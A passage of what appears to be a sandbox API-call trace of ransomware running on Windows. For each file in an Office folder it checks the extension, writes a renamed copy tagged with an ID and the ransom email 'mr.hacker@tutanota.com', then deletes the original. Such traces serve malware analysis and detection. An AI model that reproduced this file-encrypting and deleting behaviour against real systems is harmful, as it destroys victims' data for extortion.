(lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.308] lstrlenW (lpString=".dbf") returned 4 [0272.308] lstrcmpiW (lpString1=".dbf", lpString2=".gta") returned -1 [0272.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.308] lstrlenW (lpString=".1cd") returned 4 [0272.308] lstrcmpiW (lpString1=".1cd", lpString2=".gta") returned -1 [0272.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.308] lstrlenW (lpString=".jpg") returned 4 [0272.308] lstrcmpiW (lpString1=".jpg", lpString2=".gta") returned 1 [0272.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.308] lstrlenW (lpString=".doc") returned 4 [0272.308] lstrcmpiW (lpString1=".doc", lpString2=".gta") returned -1 [0272.308] lstrlenW (lpString=".docx") returned 5 [0272.308] lstrcmpiW (lpString1=".docx", lpString2="n.gta") returned -1 [0272.309] lstrlenW (lpString=".pdf") returned 4 [0272.309] lstrcmpiW (lpString1=".pdf", lpString2=".gta") returned 1 [0272.309] lstrlenW (lpString=".xls") returned 4 [0272.309] lstrcmpiW (lpString1=".xls", lpString2=".gta") returned 1 [0272.309] lstrlenW (lpString=".xlsx") returned 5 [0272.309] lstrcmpiW (lpString1=".xlsx", lpString2="n.gta") returned -1 [0272.309] lstrlenW (lpString=".ppt") returned 4 [0272.309] lstrcmpiW (lpString1=".ppt", lpString2=".gta") returned 1 [0272.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.309] lstrlenW (lpString=".zip") returned 4 [0272.309] lstrcmpiW (lpString1=".zip", lpString2=".gta") returned 1 [0272.309] lstrlenW (lpString=".rar") returned 4 [0272.309] lstrcmpiW (lpString1=".rar", lpString2=".gta") returned 1 [0272.309] lstrlenW (lpString=".bz2") returned 4 [0272.309] lstrcmpiW (lpString1=".bz2", lpString2=".gta") returned -1 [0272.309] lstrlenW (lpString=".7z") returned 3 [0272.309] lstrcmpiW (lpString1=".7z", lpString2="gta") returned -1 [0272.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.309] lstrlenW (lpString=".dbf") returned 4 [0272.309] lstrcmpiW (lpString1=".dbf", lpString2=".gta") returned -1 [0272.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.309] lstrlenW (lpString=".1cd") returned 4 [0272.309] lstrcmpiW (lpString1=".1cd", lpString2=".gta") returned -1 [0272.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.309] lstrlenW (lpString=".jpg") returned 4 [0272.309] lstrcmpiW (lpString1=".jpg", lpString2=".gta") returned 1 [0272.309] lstrcmpiW (lpString1=".gta", lpString2=".USA") returned -1 [0272.309] lstrlenW (lpString="Discussion14.gta") returned 16 [0272.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.310] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=362441) returned 1 [0272.310] CloseHandle (hObject=0x3b4) returned 1 [0272.310] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta")) returned 0x20 [0272.310] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.310] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.310] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.311] GetLastError () returned 0x0 [0272.311] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x587c9, lpOverlapped=0x0) returned 1 [0272.318] WriteFile (in: hFile=0x2bc, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x587d0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x587d0, lpOverlapped=0x0) returned 1 [0272.324] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.324] WriteFile (in: hFile=0x2bc, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0272.324] SetEndOfFile (hFile=0x2bc) returned 1 [0272.324] CloseHandle (hObject=0x2bc) returned 1 [0272.324] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.324] SetEndOfFile (hFile=0x3b4) returned 1 [0272.332] CloseHandle (hObject=0x3b4) returned 1 [0272.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.332] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta")) returned 1 [0272.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.333] lstrlenW (lpString=".doc") returned 4 [0272.333] lstrcmpiW (lpString1=".doc", lpString2=".gta") returned -1 [0272.333] lstrlenW (lpString=".docx") returned 5 [0272.333] lstrcmpiW (lpString1=".docx", lpString2="4.gta") returned -1 [0272.333] lstrlenW (lpString=".pdf") returned 4 [0272.333] lstrcmpiW (lpString1=".pdf", lpString2=".gta") returned 1 [0272.333] lstrlenW (lpString=".xls") returned 4 [0272.333] lstrcmpiW (lpString1=".xls", lpString2=".gta") returned 1 [0272.333] lstrlenW (lpString=".xlsx") returned 5 [0272.333] lstrcmpiW (lpString1=".xlsx", lpString2="4.gta") returned -1 [0272.333] lstrlenW (lpString=".ppt") returned 4 [0272.333] lstrcmpiW (lpString1=".ppt", lpString2=".gta") returned 1 [0272.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.333] lstrlenW (lpString=".zip") returned 4 [0272.333] lstrcmpiW (lpString1=".zip", lpString2=".gta") returned 1 [0272.333] lstrlenW (lpString=".rar") returned 4 [0272.333] lstrcmpiW (lpString1=".rar", lpString2=".gta") returned 1 [0272.333] lstrlenW (lpString=".bz2") returned 4 [0272.333] lstrcmpiW (lpString1=".bz2", lpString2=".gta") returned -1 [0272.333] lstrlenW (lpString=".7z") returned 3 [0272.333] lstrcmpiW (lpString1=".7z", lpString2="gta") returned -1 [0272.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.333] lstrlenW (lpString=".dbf") returned 4 [0272.333] lstrcmpiW (lpString1=".dbf", lpString2=".gta") returned -1 [0272.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.333] lstrlenW (lpString=".1cd") returned 4 [0272.333] lstrcmpiW (lpString1=".1cd", lpString2=".gta") returned -1 [0272.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.334] lstrlenW (lpString=".jpg") returned 4 [0272.334] lstrcmpiW (lpString1=".jpg", lpString2=".gta") returned 1 [0272.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.334] lstrlenW (lpString=".doc") returned 4 [0272.334] lstrcmpiW (lpString1=".doc", lpString2=".gta") returned -1 [0272.334] lstrlenW (lpString=".docx") returned 5 [0272.334] lstrcmpiW (lpString1=".docx", lpString2="4.gta") returned -1 [0272.334] lstrlenW (lpString=".pdf") returned 4 [0272.334] lstrcmpiW (lpString1=".pdf", lpString2=".gta") returned 1 [0272.334] lstrlenW (lpString=".xls") returned 4 [0272.334] lstrcmpiW (lpString1=".xls", lpString2=".gta") returned 1 [0272.334] lstrlenW (lpString=".xlsx") returned 5 [0272.334] lstrcmpiW (lpString1=".xlsx", lpString2="4.gta") returned -1 [0272.334] lstrlenW (lpString=".ppt") returned 4 [0272.334] lstrcmpiW (lpString1=".ppt", lpString2=".gta") returned 1 [0272.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.334] lstrlenW (lpString=".zip") returned 4 [0272.334] lstrcmpiW (lpString1=".zip", lpString2=".gta") returned 1 [0272.334] lstrlenW (lpString=".rar") returned 4 [0272.334] lstrcmpiW (lpString1=".rar", lpString2=".gta") returned 1 [0272.334] lstrlenW (lpString=".bz2") returned 4 [0272.334] lstrcmpiW (lpString1=".bz2", lpString2=".gta") returned -1 [0272.334] lstrlenW (lpString=".7z") returned 3 [0272.334] lstrcmpiW (lpString1=".7z", lpString2="gta") returned -1 [0272.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.334] lstrlenW (lpString=".dbf") returned 4 [0272.334] lstrcmpiW (lpString1=".dbf", lpString2=".gta") returned -1 [0272.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.334] lstrlenW (lpString=".1cd") returned 4 [0272.335] lstrcmpiW (lpString1=".1cd", lpString2=".gta") returned -1 [0272.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64 [0272.335] lstrlenW (lpString=".jpg") returned 4 [0272.335] lstrcmpiW (lpString1=".jpg", lpString2=".gta") returned 1 [0272.335] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.335] lstrlenW (lpString="DL_RES.DLL") returned 10 [0272.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.336] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=10632) returned 1 [0272.336] CloseHandle (hObject=0x3b4) returned 1 [0272.336] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll")) returned 0x20 [0272.336] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.336] lstrlenW (lpString=".doc") returned 4 [0272.336] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.336] lstrlenW (lpString=".docx") returned 5 [0272.336] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.336] lstrlenW (lpString=".pdf") returned 4 [0272.336] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.337] lstrlenW (lpString=".xls") returned 4 [0272.337] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.337] lstrlenW (lpString=".xlsx") returned 5 [0272.337] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.337] lstrlenW (lpString=".ppt") returned 4 [0272.337] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.337] lstrlenW (lpString=".zip") returned 4 [0272.337] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.337] lstrlenW (lpString=".rar") returned 4 [0272.337] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.337] lstrlenW (lpString=".bz2") returned 4 [0272.337] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.337] lstrlenW (lpString=".7z") returned 3 [0272.337] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.337] lstrlenW (lpString=".dbf") returned 4 [0272.337] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.337] lstrlenW (lpString=".1cd") returned 4 [0272.337] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.337] lstrlenW (lpString=".jpg") returned 4 [0272.337] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.337] lstrlenW (lpString=".doc") returned 4 [0272.337] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.337] lstrlenW (lpString=".docx") returned 5 [0272.337] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.337] lstrlenW (lpString=".pdf") returned 4 [0272.338] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.338] lstrlenW (lpString=".xls") returned 4 [0272.338] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.338] lstrlenW (lpString=".xlsx") returned 5 [0272.338] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.338] lstrlenW (lpString=".ppt") returned 4 [0272.338] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.338] lstrlenW (lpString=".zip") returned 4 [0272.338] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.338] lstrlenW (lpString=".rar") returned 4 [0272.338] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.338] lstrlenW (lpString=".bz2") returned 4 [0272.338] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.338] lstrlenW (lpString=".7z") returned 3 [0272.338] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.338] lstrlenW (lpString=".dbf") returned 4 [0272.338] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.338] lstrlenW (lpString=".1cd") returned 4 [0272.338] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0272.338] lstrlenW (lpString=".jpg") returned 4 [0272.338] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.338] lstrcmpiW (lpString1=".VRD", lpString2=".USA") returned 1 [0272.338] lstrlenW (lpString="DOORSCHD.VRD") returned 12 [0272.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.339] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=1723) returned 1 [0272.339] CloseHandle (hObject=0x3b4) returned 1 [0272.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd")) returned 0x20 [0272.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.339] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.339] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.340] GetLastError () returned 0x0 [0272.340] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x6bb, lpOverlapped=0x0) returned 1 [0272.341] WriteFile (in: hFile=0x2bc, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x6c0, lpOverlapped=0x0) returned 1 [0272.342] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.342] WriteFile (in: hFile=0x2bc, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.342] SetEndOfFile (hFile=0x2bc) returned 1 [0272.342] CloseHandle (hObject=0x2bc) returned 1 [0272.342] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.342] SetEndOfFile (hFile=0x3b4) returned 1 [0272.344] CloseHandle (hObject=0x3b4) returned 1 [0272.344] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.344] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd")) returned 1 [0272.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.344] lstrlenW (lpString=".doc") returned 4 [0272.344] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0272.344] lstrlenW (lpString=".docx") returned 5 [0272.344] lstrcmpiW (lpString1=".docx", lpString2="D.VRD") returned -1 [0272.344] lstrlenW (lpString=".pdf") returned 4 [0272.344] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0272.344] lstrlenW (lpString=".xls") returned 4 [0272.344] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0272.344] lstrlenW (lpString=".xlsx") returned 5 [0272.344] lstrcmpiW (lpString1=".xlsx", lpString2="D.VRD") returned -1 [0272.344] lstrlenW (lpString=".ppt") returned 4 [0272.344] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0272.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.345] lstrlenW (lpString=".zip") returned 4 [0272.345] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0272.345] lstrlenW (lpString=".rar") returned 4 [0272.345] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0272.345] lstrlenW (lpString=".bz2") returned 4 [0272.345] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0272.345] lstrlenW (lpString=".7z") returned 3 [0272.345] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0272.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.345] lstrlenW (lpString=".dbf") returned 4 [0272.345] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0272.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.345] lstrlenW (lpString=".1cd") returned 4 [0272.345] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0272.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.345] lstrlenW (lpString=".jpg") returned 4 [0272.345] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0272.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.345] lstrlenW (lpString=".doc") returned 4 [0272.345] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0272.345] lstrlenW (lpString=".docx") returned 5 [0272.345] lstrcmpiW (lpString1=".docx", lpString2="D.VRD") returned -1 [0272.345] lstrlenW (lpString=".pdf") returned 4 [0272.345] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0272.345] lstrlenW (lpString=".xls") returned 4 [0272.345] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0272.345] lstrlenW (lpString=".xlsx") returned 5 [0272.345] lstrcmpiW (lpString1=".xlsx", lpString2="D.VRD") returned -1 [0272.345] lstrlenW (lpString=".ppt") returned 4 [0272.346] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0272.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.346] lstrlenW (lpString=".zip") returned 4 [0272.346] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0272.346] lstrlenW (lpString=".rar") returned 4 [0272.346] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0272.346] lstrlenW (lpString=".bz2") returned 4 [0272.346] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0272.346] lstrlenW (lpString=".7z") returned 3 [0272.346] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0272.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.346] lstrlenW (lpString=".dbf") returned 4 [0272.346] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0272.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.346] lstrlenW (lpString=".1cd") returned 4 [0272.346] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0272.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0272.346] lstrlenW (lpString=".jpg") returned 4 [0272.346] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0272.346] lstrcmpiW (lpString1=".VSL", lpString2=".USA") returned 1 [0272.346] lstrlenW (lpString="DRILLDWN.VSL") returned 12 [0272.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.697] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=64872) returned 1 [0272.698] CloseHandle (hObject=0x388) returned 1 [0272.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl")) returned 0x20 [0272.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl"), 